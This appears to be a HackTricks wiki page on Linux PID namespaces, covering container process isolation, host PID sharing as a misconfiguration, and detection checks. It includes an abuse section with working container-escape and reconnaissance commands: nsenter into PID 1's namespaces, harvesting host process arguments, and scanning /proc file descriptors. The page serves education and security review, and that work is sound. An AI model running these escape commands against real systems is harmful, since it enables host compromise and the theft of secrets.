pid-namespace.md (10204B)
1 --- 2 title: "PID Namespace" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/namespaces/pid-namespace.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/namespaces/pid-namespace.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # PID Namespace 14 15 ## Overview 16 17 The PID namespace controls how processes are numbered and which processes are visible. This is why a container can have its own PID 1 even though it is not a real machine. Inside the namespace, the workload sees what appears to be a local process tree. Outside the namespace, the host still sees the real host PIDs and the full process landscape. 18 19 From a security point of view, the PID namespace matters because process visibility is valuable. Once a workload can see host processes, it may be able to observe service names, command-line arguments, secrets passed in process arguments, environment-derived state through `/proc`, and potential namespace-entry targets. If it can do more than just see those processes, for example by sending signals or using ptrace under the right conditions, the problem becomes much more serious. 20 21 ## Operation 22 23 A new PID namespace starts with its own internal process numbering. The first process created inside it becomes PID 1 from the namespace's point of view, which also means it gets special init-like semantics for orphaned children and signal behavior. This explains a lot of container oddities around init processes, zombie reaping, and why tiny init wrappers are sometimes used in containers. 24 25 The important security lesson is that a process may look isolated because it sees only its own PID tree, but that isolation can be deliberately removed. Docker exposes this through `--pid=host`, while Kubernetes does it through `hostPID: true`. Once the container joins the host PID namespace, the workload sees host processes directly, and many later attack paths become much more realistic. 26 27 ## Lab 28 29 To create a PID namespace manually: 30 31 ```bash 32 sudo unshare --pid --fork --mount-proc bash 33 ps -ef 34 echo $$ 35 ``` 36 37 The shell now sees a private process view. The `--mount-proc` flag is important because it mounts a procfs instance that matches the new PID namespace, making the process list coherent from inside. 38 39 To compare container behavior: 40 41 ```bash 42 docker run --rm debian:stable-slim ps -ef 43 docker run --rm --pid=host debian:stable-slim ps -ef | head 44 ``` 45 46 The difference is immediate and easy to understand, which is why this is a good first lab for readers. 47 48 ## Runtime Usage 49 50 Normal containers in Docker, Podman, containerd, and CRI-O get their own PID namespace. Kubernetes Pods usually also receive an isolated PID view unless the workload explicitly asks for host PID sharing. LXC/Incus environments rely on the same kernel primitive, though system-container use cases may expose more complicated process trees and encourage more debugging shortcuts. 51 52 The same rule applies everywhere: if the runtime chose not to isolate the PID namespace, that is a deliberate reduction in the container boundary. 53 54 ## Misconfigurations 55 56 The canonical misconfiguration is host PID sharing. Teams often justify it for debugging, monitoring, or service-management convenience, but it should always be treated as a meaningful security exception. Even if the container has no immediate write primitive over host processes, visibility alone can reveal a lot about the system. Once capabilities such as `CAP_SYS_PTRACE` or useful procfs access are added, the risk expands significantly. 57 58 Another mistake is assuming that because the workload cannot kill or ptrace host processes by default, host PID sharing is therefore harmless. That conclusion ignores the value of enumeration, the availability of namespace-entry targets, and the way PID visibility combines with other weakened controls. 59 60 ## Abuse 61 62 If the host PID namespace is shared, an attacker may inspect host processes, harvest process arguments, identify interesting services, locate candidate PIDs for `nsenter`, or combine process visibility with ptrace-related privilege to interfere with host or neighboring workloads. In some cases, simply seeing the right long-running process is enough to reshape the rest of the attack plan. 63 64 The first practical step is always to confirm that host processes are really visible: 65 66 ```bash 67 readlink /proc/self/ns/pid 68 ps -ef | head -n 50 69 ls /proc | grep '^[0-9]' | head -n 20 70 ``` 71 72 Once host PIDs are visible, process arguments and namespace-entry targets often become the most useful information source: 73 74 ```bash 75 for p in 1 $(pgrep -n systemd 2>/dev/null) $(pgrep -n dockerd 2>/dev/null); do 76 echo "PID=$p" 77 tr '\0' ' ' < /proc/$p/cmdline 2>/dev/null; echo 78 done 79 ``` 80 81 If `nsenter` is available and enough privilege exists, test whether a visible host process can be used as a namespace bridge: 82 83 ```bash 84 which nsenter 85 nsenter -t 1 -m -u -n -i -p sh 2>/dev/null || echo "nsenter blocked" 86 ``` 87 88 Even when entry is blocked, host PID sharing is already valuable because it reveals service layout, runtime components, and candidate privileged processes to target next. 89 90 Host PID visibility also makes file-descriptor abuse more realistic. If a privileged host process or neighboring workload has a sensitive file or socket open, the attacker may be able to inspect `/proc/<pid>/fd/` and reuse that handle depending on ownership, procfs mount options, and the target service model. 91 92 ```bash 93 for fd_dir in /proc/[0-9]*/fd; do 94 ls -l "$fd_dir" 2>/dev/null | sed "s|^|$fd_dir -> |" 95 done 96 grep " /proc " /proc/mounts 97 ``` 98 99 These commands are useful because they answer whether `hidepid=1` or `hidepid=2` is reducing cross-process visibility and whether obviously interesting descriptors such as open secret files, logs, or Unix sockets are visible at all. 100 101 ### Full Example: host PID + `nsenter` 102 103 Host PID sharing becomes a direct host escape when the process also has enough privilege to join the host namespaces: 104 105 ```bash 106 ps -ef | head -n 50 107 capsh --print | grep cap_sys_admin 108 nsenter -t 1 -m -u -n -i -p /bin/bash 109 ``` 110 111 If the command succeeds, the container process is now executing in the host mount, UTS, network, IPC, and PID namespaces. The impact is immediate host compromise. 112 113 Even when `nsenter` itself is missing, the same result may be achievable through the host binary if the host filesystem is mounted: 114 115 ```bash 116 /host/usr/bin/nsenter -t 1 -m -u -n -i -p /host/bin/bash 2>/dev/null 117 ``` 118 119 ### Recent Runtime Notes 120 121 Some PID-namespace-relevant attacks are not traditional `hostPID: true` misconfigurations, but runtime implementation bugs around how procfs protections are applied during container setup. 122 123 #### `maskedPaths` race to host procfs 124 125 In vulnerable `runc` versions, attackers able to control the container image or `runc exec` workload could race the masking phase by replacing container-side `/dev/null` with a symlink to a sensitive procfs path such as `/proc/sys/kernel/core_pattern`. If the race succeeded, the masked-path bind mount could land on the wrong target and expose host-global procfs knobs to the new container.<sup>[[1]](#references)</sup> 126 127 Useful review command: 128 129 ```bash 130 jq '.linux.maskedPaths' config.json 2>/dev/null 131 ``` 132 133 This is important because the eventual impact may be the same as a direct procfs exposure: writable `core_pattern` or `sysrq-trigger`, followed by host code execution or denial of service. 134 135 #### Namespace injection with `insject` 136 137 Namespace injection tools such as `insject` show that PID-namespace interaction does not always require pre-entering the target namespace before process creation. A helper can attach later, use `setns()`, and execute while preserving visibility into the target PID space:<sup>[[2]](#references)</sup> 138 139 ```bash 140 sudo insject -S -p $(pidof containerd-shim) -- bash -lc 'readlink /proc/self/ns/pid && ps -ef' 141 ``` 142 143 This kind of technique matters mainly for advanced debugging, offensive tooling, and post-exploitation workflows where namespace context must be joined after the runtime has already initialized the workload. 144 145 ### Related FD Abuse Patterns 146 147 Two patterns are worth calling out explicitly when host PIDs are visible. First, a privileged process may keep a sensitive file descriptor open across `execve()` because it was not marked `O_CLOEXEC`. Second, services may pass file descriptors over Unix sockets through `SCM_RIGHTS`. In both cases the interesting object is not the pathname anymore, but the already-open handle that a lower-privilege process may inherit or receive. 148 149 This matters in container work because the handle may point to `docker.sock`, a privileged log, a host secret file, or another high-value object even when the path itself is not directly reachable from the container filesystem. 150 151 ## Checks 152 153 The purpose of these commands is to determine whether the process has a private PID view or whether it can already enumerate a much broader process landscape. 154 155 ```bash 156 readlink /proc/self/ns/pid # PID namespace identifier 157 ps -ef | head # Quick process list sample 158 ls /proc | head # Process IDs and procfs layout 159 ``` 160 161 What is interesting here: 162 163 - If the process list contains obvious host services, host PID sharing is probably already in effect. 164 - Seeing only a tiny container-local tree is the normal baseline; seeing `systemd`, `dockerd`, or unrelated daemons is not. 165 - Once host PIDs are visible, even read-only process information becomes useful reconnaissance. 166 167 If you discover a container running with host PID sharing, do not treat it as a cosmetic difference. It is a major change in what the workload can observe and potentially affect. 168 169 ## References 170 171 - [1] [runc security advisory: container escape via "masked path" abuse due to mount race conditions (CVE-2025-31133)](https://github.com/opencontainers/runc/security/advisories/GHSA-9493-h29p-rfm2) 172 - [2] [Tool Release – insject: A Linux Namespace Injector](https://www.nccgroup.com/research-blog/tool-release-insject-a-linux-namespace-injector/)